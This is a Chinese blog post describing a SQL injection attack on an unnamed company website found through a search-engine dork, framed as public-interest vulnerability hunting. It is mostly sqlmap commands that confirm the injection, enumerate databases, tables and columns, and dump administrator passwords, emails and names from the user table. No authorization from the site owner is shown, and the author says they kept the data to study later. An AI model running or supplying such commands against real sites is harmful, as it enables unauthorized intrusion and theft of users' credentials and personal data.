记xx公司SQL注入漏洞

就在早上,我起床的时候,我的朋友,叫我参加公益SRC.然后我被拉去挖掘公益SRC.我打开了Google搜索:inurl:科技公司.然后我打开了个网站.我预览了一下网站发现?id出于职业病.我在?id后面添加了个单引号ok呀.页面发生改变.我推测有xss或者SQL注入漏洞.

 开始渗透测试.

拿出sqlmap直接一把梭.

python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class="

结果真有漏洞.那就接着测试,

python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" --dbs

 

这里有两个库:bdm818993245_db,information_schema

接着一把梭.

python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db --tables

bdm818993245_db数据库下面有9张表:

| user             || gplat_book       || gplat_news       || gplat_newsclass  || gplat_newsclass2 || href             || job              || job_add          || lawyer_wenda     |

接下来查询user下面的管理员和密码.

python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user --columns

 可以空格user下面存在13个列:

+-----------+---------------+| Column    | Type          |+-----------+---------------+| adder     | varchar(8)    || admin     | int(2)        || email     | varchar(60)   || grade     | varchar(12)   || id        | int(6)        || image     | varchar(70)   || name      | varchar(60)   || pass      | varchar(60)   || phone     | varchar(14)   || qianming  | varchar(100)  || times     | datetime      || up_time   | datetime      || xingb     | varchar(2)    |+-----------+---------------+

接下来查询user下面admni和pass的数据:

python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C admin,pass --dump

接下来收集一下数据库的数据:

python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C email --dump

 

接着收集数据:

python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C

 

 

查询管理员的用户名:

python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C  name --dump

收集的差不多了.结束渗透测试.剩下的数据库和表和列我要慢慢的研究.

总结:

SQl注入尽量使用手注.因为工具跑网站.很容易蹦掉.

 

 我的公众号.请各位大佬多多关照.

 

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GriySec安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值